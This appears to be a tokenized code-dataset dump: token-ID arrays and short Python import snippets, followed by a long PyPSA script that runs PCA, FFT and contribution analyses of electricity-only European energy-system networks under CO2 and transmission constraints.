220,
220,
220,
1058,
4906,
2685,
25,
12440,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
3846,
796,
2685,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
16416,
7,
944,
8,
4613,
3454,
501,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
11122,
501,
651,
353,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
16416,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
3454,
501,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
48369,
628,
220,
220,
220,
2488,
48369,
13,
2617,
353,
198,
220,
220,
220,
825,
16416,
7,
944,
11,
16416,
25,
3454,
501,
8,
4613,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
11122,
501,
900,
353,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
16416,
25,
16416,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
16416,
25,
3454,
501,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
48369,
796,
16416,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
28520,
7,
944,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
1212,
2685,
468,
28520,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
611,
28520,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
20512,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
10134,
62,
76,
1530,
3823,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
24240,
7,
944,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
1212,
2685,
468,
24240,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
611,
28520,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
20512,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
407,
2116,
13557,
10134,
62,
76,
1530,
3823,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2124,
7,
944,
8,
4613,
493,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
1395,
286,
428,
2685,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
2124,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
493,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
3846,
13,
87,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
331,
7,
944,
8,
4613,
493,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
575,
286,
428,
2685,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
331,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
493,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
3846,
13,
88,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
4686,
7,
944,
8,
4613,
493,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
4686,
286,
428,
2685,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
4686,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
493,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
3846,
13,
312,
628,
220,
220,
220,
825,
900,
62,
710,
394,
6084,
7,
944,
11,
4571,
25,
965,
11,
1306,
62,
79,
9990,
62,
3846,
8,
4613,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
8567,
379,
1306,
2685,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4571,
25,
4571,
286,
262,
1306,
2685,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
1306,
62,
79,
9990,
62,
3846,
25,
1306,
20952,
28780,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4571,
25,
965,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
1306,
62,
79,
9990,
62,
3846,
25,
20952,
28780,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
900,
35226,
7,
944,
11,
4571,
11,
1306,
62,
79,
9990,
62,
3846,
8,
628,
220,
220,
220,
825,
318,
62,
40496,
7,
944,
11,
2685,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
9787,
611,
2685,
318,
4961,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
2685,
25,
1180,
20952,
28780,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
2685,
25,
20952,
28780,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
20512,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
278,
445,
1153,
6624,
2685,
13,
278,
445,
1153,
198
] | 2.14746 | 1,614 |
import torch.optim as optim
import tqdm
from moses.utils import Logger
import torch
| [
11748,
28034,
13,
40085,
355,
6436,
198,
11748,
256,
80,
36020,
198,
6738,
285,
4629,
13,
26791,
1330,
5972,
1362,
198,
11748,
28034,
628
] | 3.541667 | 24 |
import requests
from django.core.files import File
from tempfile import mkdtemp
from shutil import copy, rmtree
import os
import yaml
import zipfile
from django.conf import settings
from docker.client import DockerClient
from docker.models.images import ImageCollection
from docker_registry_client import DockerRegistryClient
from .registry_checker import check_registry
from .models import Stack
DOCKER_COMPOSE_FILE_DEFAULT_NAME = settings.DOCKER_COMPOSE_FILE_DEFAULT_NAME
DOCKER_REGISTRY_URL = settings.DOCKER_REGISTRY_URL
CALLBACK_URL = f"http://{settings.DEPLOYER_HOSTPORT}/tasks/update/"
check_registry()
drc = DockerRegistryClient('http://' + settings.DOCKER_REGISTRY_URL)
docker_client = DockerClient()
ic = ImageCollection(docker_client)
| [
11748,
7007,
198,
6738,
42625,
14208,
13,
7295,
13,
16624,
1330,
9220,
198,
6738,
20218,
7753,
1330,
33480,
67,
29510,
198,
6738,
4423,
346,
1330,
4866,
11,
374,
16762,
631,
198,
11748,
28686,
198,
11748,
331,
43695,
198,
11748,
19974,
7753,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
198,
6738,
36253,
13,
16366,
1330,
25716,
11792,
198,
6738,
36253,
13,
27530,
13,
17566,
1330,
7412,
36307,
198,
6738,
36253,
62,
2301,
4592,
62,
16366,
1330,
25716,
8081,
4592,
11792,
198,
198,
6738,
764,
2301,
4592,
62,
9122,
263,
1330,
2198,
62,
2301,
4592,
198,
6738,
764,
27530,
1330,
23881,
628,
198,
35,
11290,
1137,
62,
9858,
48933,
62,
25664,
62,
7206,
38865,
62,
20608,
796,
6460,
13,
35,
11290,
1137,
62,
9858,
48933,
62,
25664,
62,
7206,
38865,
62,
20608,
198,
35,
11290,
1137,
62,
31553,
1797,
40405,
62,
21886,
796,
6460,
13,
35,
11290,
1137,
62,
31553,
1797,
40405,
62,
21886,
198,
34,
7036,
31098,
62,
21886,
796,
277,
1,
4023,
1378,
90,
33692,
13,
7206,
6489,
21414,
1137,
62,
39,
10892,
15490,
92,
14,
83,
6791,
14,
19119,
30487,
198,
198,
9122,
62,
2301,
4592,
3419,
198,
67,
6015,
796,
25716,
8081,
4592,
11792,
10786,
4023,
1378,
6,
1343,
6460,
13,
35,
11290,
1137,
62,
31553,
1797,
40405,
62,
21886,
8,
198,
198,
45986,
62,
16366,
796,
25716,
11792,
3419,
198,
291,
796,
7412,
36307,
7,
45986,
62,
16366,
8,
628,
628,
628,
628,
628,
628
] | 3.179167 | 240 |
# Import libraries
import os
import sys
import pypsa
import numpy as np
import pandas as pd
#from sympy import latex
import time
import math
# Timer
t0 = time.time() # Start a timer
# Import functions file
sys.path.append(os.path.split(os.getcwd())[0])
from functions_file import *
# Directory of file
#directory = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Data\\elec_only\\"
directory = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Data\\elec_only\\"
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Generic file name
titleFileName = file
# Figure path
#figurePath = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Figures\\elec_only\\"
figurePath = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Figures\\elec_only\\"
##############################################################################
##############################################################################
################################# Pre Analysis ###############################
##############################################################################
##############################################################################
# ------------------- Curtailment - CO2 constraints (Elec) ------------------#
# Path to save files
path = figurePath + "Pre Analysis\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_CO2, title=title, constraints=constraints, fontsize=14, ylim=[-1,20], figsize=[6, 4.5])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (CO2)"))
# --------------- Curtailment - Transmission constraints (Elec) --------------#
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_trans, title=title, constraints=constraints, fontsize=14, rotation=-17.5, ylim=[-2,60], legendLoc="upper right", figsize=[6, 4.8])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (trans)"))
##############################################################################
##############################################################################
################################### MISMATCH #################################
##############################################################################
##############################################################################
# ------- Electricity produced by technology (Elec CO2 and Trans) -----------#
# Path to save files
path = figurePath + "Mismatch\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_CO2, constraints=constraints, fontsize=14, figsize=[6,6])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (CO2)"))
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_trans, constraints=constraints, rotation=-25, fontsize=14, figsize=[6,6.3])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (trans)"))
# ------------------ Map Capacity Plots (Elec) ------------------#
# Path to save files
path = figurePath + "Mismatch\\Map Capacity\\"
# --- Elec ---
# Import network
network = pypsa.Network(directory+file)
fig1, fig2, fig3 = MapCapacityOriginal(network, titleFileName, ncol=3)
SavePlot(fig1, path, title=(file[12:-3] + " - Map Capacity Elec Generator"))
SavePlot(fig2, path, title=(file[12:-3] + " - Map Capacity Elec Storage Energy"))
SavePlot(fig3, path, title=(file[12:-3] + " - Map Capacity Elec Storage Power"))
# -------------------- Map Energy Plot (Elec) -------------------#
# Path for saving file
path = figurePath + "Mismatch\\Map Energy Distribution\\"
# Import network
network = pypsa.Network(directory+file)
# --- Elec ---
figElec = MapCapacityElectricityEnergy(network, file)
SavePlot(figElec, path, title=(file[12:-3] + " - Elec Energy Production"))
# --------------------- Map PC Plot (Elec) ----------------------#
# Path to save plots
path = figurePath + "Mismatch\\Map PC\\"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# ----------------------- Map Plot (Elec) -----------------------#
# Plot map PC for mismatch electricity
titlePlotElec = "Mismatch for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1))#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- FFT Plot (Elec) -----------------------#
# Path to save FFT plots
path = figurePath + "Mismatch\\FFT\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = (i+1))
title = (file[12:-3] + " - FFT Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Seasonal\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6,dpi=400)
title = (file[12:-3] + " - Seasonal Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Timeseries\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------- Contribution plot (Elec) ------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Contribution\\"
# --- Elec ---
# Contribution
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedConElec,i+1,10,suptitle=("Electricity Contribution - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Contribution Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Response plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Response\\"
# --- Elec ---
# Response
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedResElec,i+1,10,suptitle=("Electricity Response - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Response Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Covariance plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Covariance\\"
# --- Elec ---
# Covariance
covMatrixElec = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec).T
for i in range(6):
fig = ConPlot(eigenValuesElec,covMatrixElec,i+1,10,suptitle=("Electricity Covariance - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Covariance Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Combined Projection plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Projection\\"
# --- Elec ---
for i in range(6):
fig = CombConPlot(eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec, i+1, depth = 6) #, suptitle=("Electricity Projection - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Projection Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec (lambda 1 & 2)")
SavePlot(fig, path, title)
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixCO2Elec = []
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec Mismatch")
SavePlot(fig, path, titleBarCO2Elec)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
#path = "C:/Users/jense/OneDrive - Aarhus Universitet/Dokumenter/ร
rhus Universitet/Kandidat - Civilingeniรธr/11. Semester/Master Thesis/Shared Documents/Figures/elec_only/Bar/"
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixTransmissionElec = []
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "Number of PC describing variance of network as a function of transmission constraint"
xlabel = "Transmission constraint"
suptitleElec = ("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec Mismatch")
SavePlot(fig, path, titleBarTransmissionElec)
# ------------------ Change in contribution and response CO2 ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
#%%
from functions_file import *
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance'
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (CO2)"
